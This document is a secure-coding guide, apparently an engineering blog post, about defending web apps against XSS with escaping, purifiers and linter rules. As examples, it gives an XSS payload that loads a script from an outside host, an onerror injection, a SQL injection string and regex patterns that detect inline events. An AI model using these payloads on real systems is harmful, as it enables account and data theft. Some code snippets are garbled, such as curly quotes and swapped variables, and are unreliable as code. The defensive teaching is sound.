Secure Coding Practices

Introduction

First of all, take a look at the XSS Cheat Sheet and the HTML5 Security Cheat Sheet about the many ways a website can be exploited using cross-site scripting (XSS) techniques. Persistent XSS can occur when a website prints or injects text or HTML code into the page. Examples: [php] // Smarty <p>Name: {$smarty.get.user_name}</p>   // PHP <p><?php echo($_GET['user_name']); ?></p>   // JavaScript document.write('Name: ' + json.userName);   // jQuery jContainer.html(‘Name: ’ + json.userName); jContainer.append(‘<div class=”icon” title=”’ + json.userName + ’”></div>’); [/php] Suppose that Mallory, a malicious user, enters “><script src=”http://www.xss.com/attack.js”></script><img src=”nothing.jpg” onerror=”attack()”><” into the "name" input field of his profile page. When Alice views Mallory’s profile page, attack() is run* and her private information can be easily stolen. * Script elements inserted using the native innerHTML are not executed, but many libraries, such as jQuery and dojo, would download and execute the referenced script file when a script element is injected into the page.

Wrong Approaches

János Pásztor listed several approaches that are insufficient or not suitable for securing webapps:
  • strip_tags() – “I < 3” is converted to “I", which is not desired
  • Escaping user input before storing – this ties to the output medium or platform and data will need to be unescaped at some point later, which can get very nasty because double-unescaping can easily occur
He pointed out that “filtering bad HTML with a regexp” is insufficient. Although there is no bullet-proof way to secure a webapp, a carefully-written regex library (blacklist) with logging can definitely make it harder for hackers to locate security holes. And with community-supported, whitelist libraries like Caja’s HTML Sanitizer, programming mistakes and potential security threats on client-side can be easily caught and reported.

Anti-XSS Coding Practices

Basic Coding Best Practices

Escape all User Inputs and Variables

User input has to be validated. Any variables that could contain user input should be escaped when they are executed (output). Most languages provide helper functions that can strip off malicious code. [php] // PHP – in the ideal world, HTML should be written in the template // But if it has to be in PHP... <? echo( htmlspecialchars($_GET[‘user_name’]), ENT_XHTML, 'UTF-8') ); ?> // Smarty – escape any user input <p>{$smarty.get.user_name|escape:’html’,'UTF-8'}</p> // jQuery – use .text() to escape text – read on for more information $('#user_name').text(userName); [/php]
Escape based on Execution Context
One of the challenges of making applications secure is that the same string of code can be interpreted differently in different contexts. Each context requires its own method of escaping. For example, a user comment on a message board can say...
  • “Do not write anything like <script>alert()</script>!” This is a valid comment, and should be stored into the database as is. It probably means nothing to the backend, but when it is inserted into the HTML context, it could be dangerous.
  • “\'; DROP TABLE users; --” This is totally valid for the purpose of displaying on the page using HTML, but when it is used to construct a SQL query, SQL injection could happen if it is not handled properly.
The first example, “Do not write anything like <script>alert()</script>!”, needs to be escaped when we display it on the page. The second one, "\'; DROP TABLE users; --", should be escaped when we save into the database. Another example: a folder is named › PS?*"|<iframe src="www.box.com">, and it gets displayed in the breadcrumb of the Box webapp. [php] // BAD - Smarty code with "noescape" <a id="p_11600290" href="#" class="path" title="{$path_html|noescape}" data-view_id="path_{}">...</a> // Result: HTML breaks and the browser displays an iframe! <a id="p_11600290" href="#" class="path" title="&#8250; PS?*"<>|<iframe src="www.box.com">" data-view_id="path_{}">...</a> // GOOD - Smarty code with escape: 'html' <a id="p_11600290" href="#" class="path" title="{$path_html|escape:'html'}" data-view_id="path_{}">...</a> // Result: HTML doesn't break <a id="p_11600290" href="#" class="path" title="&amp;#8250; PS?*&quot;&lt;&gt;|&lt;iframe src=&quot;www.box.com&quot;&gt;" data-view_id="path_{}">...</a> [/php] Therefore, data from user input should maintain its state until just before it is being evaluated. When data is ready to be transferred to another context, do not escape it yet; it should be escaped after the other context receives the data because this new context knows better what escape methods should be used. Content should be escaped when it is received from another context because one context should not trust another context.

Remove Inline Events

It is critically important to not write any inline events in HTML. Inline events are signs of bad JavaScript architecture, and they can easily be used as tools for XSS attacks. If an inline event handler reads from user-provided input (shown in the example below), the input needs to be escaped before they are passed into the function, making it very hard to author: [php] // Bad <a href=”#” onclick=”Collborate({email: userEmail, name: userName}); return false;”>Link</a> // Bad $ele.append(‘<a href=”#” onclick=”Collborate({email: userEmail, name: userName}); return false;”>Link</a>’); // Bad - It is "safe," but we have to escape repeatedly every time we call this function inline $ele.append(‘<a href=”#” onclick=”Collborate({email: $.text(userEmail), $.text(name: userName)}); return false;”>Link</a>’); // Good var $anchor = $(‘<a href=”#”></a>’); $anchor.text(‘Link’); var userId = $.text(userId); var userName = $.text(userName); $anchor.on(‘click’, function(){ Collborate({id: userId, name: userName}); }); $ele.append(jAnchor); [/php] The goal of not having any inline events at all is that we can then add linter rules to prevent any developer from adding inline events that can expose security holes. Another goal of living in an inline-event-free environment is that it can turn on a Content Security Policy (CSP) for greater XSS protection. Remember that we not only want to program securely, but also want to make it hard not to program securely.

Avoid String Concatenation in DOM Manipulation APIs

Having concentrated strings (or Array.join()) makes us forget that variables need to be escaped. It is a good practice to not do any string concatenation and force ourselves to use methods like .text(). And again, this practice should be checked with linter rules. [php] // Bad $(‘<div>’ + json.user_name + ‘</div>’); // Bad $(‘#user_url’).append(‘<div id=”user_’ + json.user_id + ’”>’ + json.user_name + ‘</div>’); // Good var newDiv = $(‘<div></div>’).text(json.user_name); newDiv.attr(json.user_id); // assuming attr would escape the input – read on... $(‘#user_url’).append(newDiv); [/php]

Use the Right Content-Type HTTP Header

The HTTP header of an XHR response needs to reflect the correct type. If the server returns a JSON object that could potentially contain user input (such as {name: ‘<script>alert()</script>’}), it must use the correct Content-Type: application/json. Otherwise, if, for example, text/html is used instead, the script could run in the browser.

jQuery API

.text()

According to jQuery’s documentation on .text():
We need to be aware that this method escapes the string provided as necessary so that it will render correctly in HTML. To do so, it calls the DOM method .createTextNode(), which replaces special characters with their HTML entity equivalents (such as &lt; for <).
At Box, we made this very same method available using $.text(val). Here is the implementation: [javascript] text: function(text, text_filter) { if (!window['__c']) window['__c'] = document.createElement('div'); var div = window['__c’]; (typeof div.innerText != 'undefined') ? div.innerText = text : div.textContent = ((text === 0) ? text + '' : text || ''); var prefiltered_text = div.innerHTML.replace(/"/g, '&quot;').replace(/'/g, '&#039;'); if (text_filter) { return text_filter(prefiltered_text); } return prefiltered_text; } [/javascript] The idea is that any text that could be coming from a user input should be escaped using either $.text() or .text().

.html() and other DOM manipulation methods

jQuery's .html() executes script elements created with the jQuery wrapper. It could also attach inline events. For example, when you run the following code: [javascript] ele.innerHTML = '<img src="attack.js" onerror="alert(\'attack\')">' > "<img src="attack.js" onerror="alert('attack')">" > GET http://api.jquery.com/html/attack.js 404 (Not Found) [/javascript] Here, an alert would show up. Therefore, we need to be very careful about what gets passed in to .html(). Similar theory applies to other jQuery DOM manipulation methods, such as append(), appendTo(), prepend(), prependTo(), after(), before(), replaceWith(), attr(), and more. A recommended approach to use .html() (and other DOM manipulation methods) is that we escape the content before we call it: [javascript] // BAD jEle.html(‘<div id=”f_’ + json.user_id + ’”>’ + json.user_name + ’</div>’); // THE SAFER WAY var userName = $j.text(json.user_name); var userId = $j.text(json.user_id); jEle.html(‘<div id=”f_’ + userName + ’”>’ + userId + ’</div>’); // RECOMMENDED – THIS IS SAFE AND IS CLEAR var jDiv = $j(‘<div></div>’); // text() and attr() both escape input jDiv.attr(json.user_id).text(json.user_name); // add to the DOM only when we’re finished touching jDiv for better performance jEle.append(jDiv); [/javascript]

escape() in JavaScript?

In general, we should never use escape(). According to w3schools,
This function makes a string portable, so it can be transmitted across any network to any computer that supports ASCII characters. This function encodes special characters, with the exception of: * @ - _ + . /
escape() uses an extremely conservative approach that almost guarantees that the string can be used safely on any platform, making it unsuitable to preserve the original string. It has to pair with unescape() to reverse the effect, and that makes it hard to manage especially in large apps. It is not uncommon to encounter double-escape issues. Before we display any escaped text in the browser, it needs to be unescaped, but unescaped text can be dangerous. This makes escape() useless in this common scenerio.

Escaping URLs

Simple escape does not work for URLs because it breaks “?”, “=” and “&”, which are frequently used in URLs: [javascript] > escape('/index?user_name=david&department=engineering') "/index%3Fuser_name%3Ddavid%26department%3Dengineering" [/javascript] There are other URL-safe escape methods: [php] // PHP <a href="http://www.box.com/?index=<? echo(urlencode($_GET['user_name'])); ?>">Link</a> // Smarty <a href="http://www.box.com/?index={$smarty.get.user_name|escape:'url'}">Link</a> // JavaScript – encodes the following characters: , / ? : @ & = + $ # '<a href="http://www.box.com/?index=' + encodeURIComponent(foo) + ‘”>Link</a>’ // JavaScript – an entire URL - encodes special characters, except: , / ? : @ & = + $ # '<a href="encodeURI(foo) + ‘”>Link</a>’ [/php]

Frameworks

jQuery

Be sure to use jQuery 1.8 or above, which has better XSS protection due to the separation of the content creation and element selection in $(). See jQuery 1.8 Beta 1: See What’s Coming (and Going!)

Client-side Purifier

Client-side purifiers are needed to purify:
  • HTML that is generated and injected into the DOM during run-time
  • XHR responses that are received from the server (it should not trust the network layer, and server can be third-party)
The purifier should be called every time when a DOM manipulation method is used. In jQuery, there is an internal clean() function that does some basic cleaning, but it allows inline events and script elements to be created and executed. This function is a good candidate for the placement of a purifier. Here is the expected behavior of a client-side purifier: client_side_purifier_example There are two major approaches: blacklist and whitelist.

Blacklist

A blacklist solution can be done in-house. It is a set of regex rules that matches and removes XSS attacks. For example, /on(click|mouseover|mouseout|load)[\s]*=[\s]*[“]*/gi matches some inline events. When a match is found, it should be removed and reported back to the logging server.
Pros
  • Small file size
  • Flexible and easy to maintain
  • Regex rules can be added easily
  • Logging for each individual regex rule is much easier
Cons
  • Able to catch the most obvious security risks, but any blacklist approach can be exploited by dedicated hackers

Whitelist

There are not many community-supported whitelist solutions for client-side. Caja’s HTML Sanitizer is the most well-known one. It takes a pre-defined list of allowed HTML tags and attributes, and CSS properties, and it removes anything not defined in the list. The purifier itself is widely tested by Google.
Pros
  • Proven and supported by a community
  • Fully tested
  • Guaranteed to be more secure
  • Whitelist approach is the more secure HTML purifying solution
Cons
  • Heavy-weight and it introduces page load and bandwidth overhead (it is about 84KB minified and obfuscated)
  • Although it's not huge, it can have a negative performance impact, especially on older browsers (like IE7)
  • It needs to be upgraded or modified for any new HTML tags and properties that are either introduced by W3C or browser vendors

Server-side Purifier

Server-side purifiers are needed to purify:
  • XHR responses (that can contain HTML fragments) that are sent back to the client
  • HTML generated from Smarty templates, PHP, or similar technologies
In addition to Caja, there are many open-source options available, including:

Linting

With code quality tools like JSHint and JSLint, appropriate linter rules can prevent developers from opening potential security holes by mistake. For example, concatenated markup strings in certain DOM manipulation methods or selectors is a harmful coding practice that we want to disallow using a linter rule. The following example is another rule that can be used to disallow any HTML that has event handlers (on*) that are preceded by a whitespace or a quote, or any attribute that starts with “javascript:”: [javascript] /((\s+|['"])on\w+\s*=\s*['"])|(\s*=\s*['"]javascript:[^'^"]*['"])/i [/javascript]

Reporting

When the purifier catches any potential attacks (such as an increase number of user inputs containing HTML), it should immediately report them back to the server so that they can be investigated. Add data visualization using graphs, and implement automatic alerting. Also watch for logs for SQL syntax errors because they might be SQL injections.

Conclusion

  • Never trust any user input. Use input validation, and encode in and only in the context where variables or user inputs are executed.
  • Disallow bad coding practices (such as HTML inline events and HTML string concatenation) and enforce using linter rules.
  • Use HTML purifiers (client-side and/ or server-side) in the framework level.
  • Monitor the logs and automate alerting.
Additional Resources JS Security With Untrusted Code XSS Attacks: Cross Site Scripting Exploits and Defense (also on Amazon) Box Tech Talk: Effective Approaches to Web Application Security by Zane Lackey David is currently on the Box Web Application team developing scalable interfaces, where he also spends time experimenting new technologies such as HTML5. He is a believer of best practices and performance optimization. His personal blog is at http://www.davidtong.me